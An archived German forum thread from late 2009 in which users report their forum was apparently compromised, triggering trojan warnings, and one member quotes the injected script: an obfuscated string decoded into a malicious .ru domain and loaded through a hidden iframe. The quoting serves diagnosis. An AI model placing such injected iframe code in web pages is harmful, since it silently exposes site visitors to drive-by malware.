PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Forum war nicht erreichbar....



maniwelt
27.12.2009, 21:33
War es gehackt oder ?

Weil, ich sehe KEINE Stellungsnahme von jemanden hier im Forum.....

Aber in Skype kriegte ich einiges mit, auch ich machte ein Screenshot davon:

http://www.imagesforme.com/upload/3e629da6.jpg


Nun, was war den los :knueppel:

FloMK
27.12.2009, 21:55
Ich bekomme seit einigen Tagen wenn ich auf dsn gehe von kaspersky ne trojaner meldung. habe das auch schon ins Teamkontakt forum geschrieben.

Vielleicht wars deswegen

LG

Aradiv
27.12.2009, 22:58
die genaue Scriptadresse ist

http://adserverplus-com.secureserver.net.sahibinden-com.simplehomelink.ru:8080/google.com/google.com/google.com.ec/haberturk.com/daum.net/

dort wird folgender Code erzeugt

Qviovgib = 'a!^d$!(s&#)&)e)!$!r!)v!&!e(!^&$r^p@^!)l)(u(@s^(-#^c!($o&)@)m##.^($s$e#@c(&(u$(r$@e@&s&(&e&&)$r$!v$)e!^^r@#(.@!n))(e))(t#!^.(#&s#@a$h(!^i#@@b)$#i()#n#!(d$^e@$&(n&)-()^c^^&o@$@m##.$@#(s#!#i!()m!)^p$^@l^&e$h###&o)#m@)@e@l(!(i&$&$n#k^(.)r)@u#&'.replace(/&|\(|\!|\$|#|\)|\^|@/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Qviovgib+':8080/index.php?js';
document.body.appendChild(f);

was wenn ich es richtig erkenne diese Seite einbindet

adserverplus-com.secureserver.net.sahibinden-com.simplehomelink.ru:8080/index.php?js
die aber leer ist.

mfg
Aradiv

Xenon
27.12.2009, 23:44
Eine bessere frage währe woher kommt die Datei ?
Und wieso merkten es nur 3 Anti-Viren Programme ?

maniwelt
27.12.2009, 23:51
Eine bessere frage währe woher kommt die Datei ?
Und wieso merkten es nur 3 Anti-Viren Programme ?

Ich hab ja AVAST 5 Beta, mit neuesten Updates, selbst wenn ich jetzt den Link noch anklicke, wird mit verweigert die Seite zu öffnen :D

Das nun nicht alle erkennen, liegt daran, das die halt nicht so gut sind, oder die Java-Scripte ignorieren.

Irgend einer hier im Forum war phöse....aber ganz ganz dolle.....

*Auf den Hase schielt* :suspicious:

FloMK
27.12.2009, 23:57
das muss ja gehackt sein, sonst kommt man nicht an den php code, oder?

LG

EDIT: Ich wollte mir gerade einen Thread suchen, bin auf "Beiträge von FloMK anzeigen" und Kaspersky hat sich wieder gemeldet. Könntet iihr das bitte überprüfen...

FloMK
03.01.2010, 00:38
Bekomme schon wieder auf JEDER Unterseite diese dämliche Meldung mit Trojaner im Schlepptau.

LG

Masterphil
03.01.2010, 12:56
@all: Die Berechtigungen von uns Mods reichen nicht aus, solche Probleme zu beheben, und Cheffe ist derzeitig schwer erreichbar, also müssen wir alle warten bis dieser schreibt.

MfG

FloMK
03.01.2010, 13:02
ok vielen dank für die stellungnahme.


Aus ieinenm Grund geht es jetzt auch wieder bis auf die Nickpage

LG

Gremlin
03.01.2010, 13:09
Kann derzeit nur mit iphone on, da pc defekt. Zur sache kann ich derzeit noch kaum was sagen. Techniker haben gestern jedoch ftp abgeschottet (zugriff nur noch über meine ip)

dies betrifft den ganzen server.

@adi & freak4ever:
ihr seit ja noch die einzigen die bei mir auf server was haben. Sobald ich wieder da bin schauen wir mal was wir machen können. Habe noch einen vserver wo ich euch draufpacken kann.

Denke mal mo/di sollten die teile für pc da sein.,,